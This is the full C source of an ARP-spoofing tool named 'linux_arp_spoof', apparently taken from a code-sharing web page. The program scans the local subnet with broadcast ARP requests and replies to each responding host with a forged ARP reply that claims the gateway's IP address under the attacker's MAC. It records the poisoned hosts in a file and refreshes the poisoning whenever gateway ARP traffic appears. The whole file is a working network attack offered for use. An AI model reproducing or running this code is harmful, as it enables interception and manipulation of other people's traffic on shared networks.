?? tcpip.txt
字號:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_arp.h>
#include <netdb.h>
#include <errno.h>
#include <linux/if_ether.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/tcp.h>
#include <pthread.h>
#define ETH_INT "eth0"
#define PROGRAME_NAME "linux_arp_spoof"
#define PROGRAME_VERSION "1.0.1.19"
#define MAKETIME "08/11/30 17:21"
int sockfd;
int send_arp_flag = 0;
FILE *fp1,*fp2;
struct sockaddr_ll _sockaddr;
unsigned char my_ip[4];
unsigned char my_mac[6];
unsigned char gateway_ip[4];
unsigned char attack_ip[4];
unsigned char broadcast_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
//frame header 14 bytes
struct frame_hdr
{
unsigned char dst_mac[6];
unsigned char src_mac[6];
unsigned short frm_type;
};
////all frame 14+8+20 bytes
struct frame_ether
{
struct frame_hdr fh;
struct arphdr ah;
unsigned char src_mac[6];
unsigned char src_ip[4];
unsigned char dst_mac[6];
unsigned char dst_ip[4];
};
void *send_one_arp()
{
for(;;)
{
if(send_arp_flag == 1)
{
unsigned char d_ip[4];
struct frame_ether frame;
memcpy(frame.fh.dst_mac,broadcast_mac,6);
memcpy(frame.fh.src_mac,my_mac,6);
frame.fh.frm_type = htons(ETH_P_ARP);
frame.ah.ar_hrd = htons(ARPHRD_ETHER);
frame.ah.ar_pro = htons(ETH_P_IP);
frame.ah.ar_hln = 6;
frame.ah.ar_pln = 4;
frame.ah.ar_op = htons(ARPOP_REQUEST);
memcpy(frame.src_mac,my_mac,6);
memcpy(frame.src_ip,my_ip,4);
memcpy(frame.dst_mac,broadcast_mac,6);
if(fp2=fopen("iplist","r"))
{
while(!feof(fp1))
{
// printf("%d.%d.%d.%d\n",d_ip[0],d_ip[1],d_ip[2],d_ip[3]);
fscanf(fp1,"%d.%d.%d.%d\n",&d_ip[0],&d_ip[1],&d_ip[2],&d_ip[3]);
memcpy(frame.dst_ip,d_ip,4);
int arp_request = sendto(sockfd,&frame,sizeof(frame),0,(struct sockaddr*)
&_sockaddr,sizeof(_sockaddr));
if(arp_request > 0)
{
printf("--------------------------------------------------------------------
-----------\n");
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)",my_mac[0],my_mac
[1],my_mac[2],my_mac[3],my_mac[4],my_mac[5],my_ip[0],my_ip[1],my_ip[2],my_ip[3]);
printf("\t ---request (broadcast)--->\t");
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)\n",broadcast_mac
[0],broadcast_mac[1],broadcast_mac[2],broadcast_mac[3],broadcast_mac[4],broadcast_mac[5],d_ip[0],d_ip[1],d_ip[2],d_ip[3]);
}
else
{
perror("sendto");
}
}
}
fclose(fp2);
send_arp_flag = 0;
}
}
}
//send arp request to gateway
void *send_arp()
{
int i;
struct frame_ether frame;
memset(&frame,0,sizeof(frame));
/* set ether head */
memcpy(frame.fh.dst_mac,broadcast_mac,6);
memcpy(frame.fh.src_mac,my_mac,6);
frame.fh.frm_type = htons(ETH_P_ARP);
/* define arp ether head */
frame.ah.ar_hrd = htons(ARPHRD_ETHER);
frame.ah.ar_pro = htons(ETH_P_IP);
frame.ah.ar_hln = 6;
frame.ah.ar_pln = 4;
frame.ah.ar_op = htons(ARPOP_REQUEST);
memcpy(frame.src_mac,my_mac,6);
memcpy(frame.src_ip,my_ip,4);
memcpy(frame.dst_mac,broadcast_mac,6);
/* send arp request broadcast */
for(;;)
{
for(i=1;i<255;i++)
{
if((i%10) == 0)
sleep(2);
if(i == gateway_ip[3] || i == my_ip[3])
{
continue;
}
else
{
attack_ip[3] = i;
memcpy(frame.dst_ip,attack_ip,4);
int arp_request = sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&_sockaddr,
sizeof(_sockaddr));
printf("size of : %d\n",arp_request);
if(arp_request > 0)
{
printf("----------------------------------------------------------------------------
---\n");
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)",my_mac[0],my_mac[1],my_mac
[2],my_mac[3],my_mac[4],my_mac[5],my_ip[0],my_ip[1],my_ip[2],my_ip[3]);
printf("\t ---request (broadcast)--->\t");
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)\n",broadcast_mac
[0],broadcast_mac[1],broadcast_mac[2],broadcast_mac[3],broadcast_mac[4],broadcast_mac[5],attack_ip[0],attack_ip[1],attack_ip
[2],attack_ip[3]);
}
else
{
perror("sendto");
}
}
}
sleep(3);
}
}
// analyse arp reply and send fake arp reply packet
void *get_arp_reply()
{
int flag,i=0;
unsigned char b_ip[4];
char buf[2048];
for(;;)
{
int n = recv(sockfd,buf,2048,0);
struct ethhdr *eth = (struct ethhdr *) buf;
if((ntohs(eth->h_proto)) == ETH_P_ARP)
{
printf("-------------------------------------------------------------------------------\n");
struct frame_ether *old_frame = (struct frame_ether*)buf;
struct frame_ether frame;
memcpy(&frame,buf,sizeof(frame));
int ar_op = ntohs(frame.ah.ar_op);
//----------------arp frame info--------------------------------------//
char ip_buf[100];
inet_ntop(AF_INET, &old_frame->src_ip, ip_buf, 100);
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%s)", old_frame->src_mac[0],old_frame->src_mac[1],old_frame-
>src_mac[2],old_frame->src_mac[3],old_frame->src_mac[4],old_frame->src_mac[5], ip_buf);
printf("\t ---");
if(ar_op == 2)
printf("reply--->\t");
if(ar_op == 1)
printf("request--->\t");
memset(ip_buf,0,100);
inet_ntop(AF_INET, &old_frame->dst_ip, ip_buf, 100);
printf("[%02x:%02x:%02x:%02x:%02x:%02x](%s)", old_frame->dst_mac[0],old_frame->dst_mac[1],old_frame-
>dst_mac[2],old_frame->dst_mac[3],old_frame->dst_mac[4],old_frame->dst_mac[5], ip_buf);
printf("\n");
//--------------------fake arp frame----------------------------//
if(ar_op == ARPOP_REPLY && (old_frame->dst_ip)[3] == my_ip[3] && (old_frame->src_ip)[3] !=
gateway_ip[3])
{//judge the packet is normal arp reply from attack ip//
//bulid faked arp reply frame
memcpy(frame.fh.dst_mac,old_frame->fh.src_mac,6);
memcpy(frame.fh.src_mac,my_mac,6);
frame.ah.ar_op = htons(ARPOP_REPLY);
memcpy(frame.dst_mac,old_frame->fh.src_mac,6);
memcpy(frame.dst_ip,old_frame->src_ip,4);
memcpy(frame.src_mac,my_mac,6);
memcpy(frame.src_ip,gateway_ip,4);
//send faked arp reply frame
int arp_reply = sendto(sockfd,&frame,sizeof(frame),0,(struct sockaddr*)&_sockaddr,sizeof
(_sockaddr));
if(arp_reply > 0)
{
flag = 0;
printf("send faked arp reply to %d.%d.%d.%d \n",(old_frame->src_ip)[0],(old_frame-
>src_ip)[1],(old_frame->src_ip)[2],(old_frame->src_ip)[3]);
if(fp1=fopen("iplist","ar+"))
{
while(!feof(fp1))
{
fscanf(fp1,"%d.%d.%d.%d\n",&b_ip[0],&b_ip[1],&b_ip[2],&b_ip[3]);
if(b_ip[3] == (old_frame->src_ip)[3])
{
flag = 1;
break;
}
}
if(flag == 0)
{
fprintf(fp1,"%d.%d.%d.%d\n",(old_frame->src_ip)[0],(old_frame-
>src_ip)[1],(old_frame->src_ip)[2],(old_frame->src_ip)[3]);
}
}
fclose(fp1);
}
else
{
perror("sendto");
}
}
if(ar_op == ARPOP_REQUEST && (old_frame->src_ip)[3] == gateway_ip[3] || ar_op == ARPOP_REQUEST &&
(old_frame->dst_ip)[3] == gateway_ip[3]/* || ar_op == ARPOP_REPLY && (old_frame->src_ip)[3] == gateway_ip[3]*/)
{
send_arp_flag = 1;
}
}
}
}
int main(int argc, char **argv)
{
unsigned char *attack;
if(argc == 2)
{
if((strcmp(argv[1],"-v"))==0||(strcmp(argv[1],"-V"))==0)
{
printf("%s version %s\n", PROGRAME_NAME,PROGRAME_VERSION);
printf("last make date : %s\n",MAKETIME);
exit(1);
}
if((strcmp(argv[1],"-h"))==0||(strcmp(argv[1],"-H"))==0)
{
printf("usage : ./linux_arp_spoof [gatewayip]\n");
exit(1);
}
if((long)inet_addr(argv[1]) < 0)
{
printf("parameter error : IP error. \n");
exit(1);
}
}
else
{
printf("parameter error,please check -h \n");
exit(-1);
}
int i;
unsigned char *cp_ip;
unsigned int src_ip[4];
struct sockaddr_in sin;
struct ifreq ifr;
if((sockfd=socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP)))<0)
{
perror("socket");
exit(0);
}
memset(&_sockaddr,0,sizeof(_sockaddr));
memset(&ifr,0,sizeof(&ifr));
// which interface in work mode
strcpy(ifr.ifr_name,ETH_INT);
if(ioctl(sockfd,SIOCGIFINDEX,&ifr) != 0)
{
perror("ioctl");
close(sockfd);
exit(1);
}
//get local mac
if(ioctl(sockfd,SIOCGIFHWADDR,&ifr) < 0)
{
perror("ioctl");
close(sockfd);
exit(2);
}
// my_mac = ifr.ifr_hwaddr.sa_data;
for(i=0;i<6;i++)
{
my_mac[i] = (unsigned char)ifr.ifr_hwaddr.sa_data[i];
}
//get local ip
if(ioctl(sockfd,SIOCGIFADDR,&ifr) < 0)
{
perror("ioctl");
close(sockfd);
exit(0);
}
memcpy(&sin, &ifr.ifr_addr, sizeof(sin));
// printf("%s \n",inet_ntoa(sin.sin_addr));
// 初始化參數,得到網關和網段
cp_ip = (unsigned char *)inet_ntoa(sin.sin_addr);
sscanf(cp_ip,"%d.%d.%d.%d",&src_ip[0],&src_ip[1],&src_ip[2],&src_ip[3]);
for(i=0;i<4;i++)
{
my_ip[i] = src_ip[i];
}
cp_ip = argv[1];
sscanf(cp_ip,"%d.%d.%d.%d",&src_ip[0],&src_ip[1],&src_ip[2],&src_ip[3]);
for(i=0;i<4;i++)
{
gateway_ip[i] = src_ip[i];
attack_ip[i] = src_ip[i];
}
_sockaddr.sll_ifindex = ifr.ifr_ifindex;
_sockaddr.sll_protocol = htons(ETH_P_ARP);
// 創建多線程
remove("iplist");
pthread_t id[3];
memset(&id,0,sizeof(id));
if(pthread_create(&id[0],NULL,send_arp,NULL) !=0)
{
printf("create pthread1 error\n");
exit(1);
}
if(pthread_create(&id[1],NULL,get_arp_reply,NULL) !=0)
{
printf("create pthread2 error\n");
exit(1);
}
if(pthread_create(&id[2],NULL,send_one_arp,NULL) !=0)
{
printf("create pthread3 error\n");
exit(1);
}
pthread_join(id[0],NULL);
pthread_join(id[1],NULL);
pthread_join(id[2],NULL);
} ?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -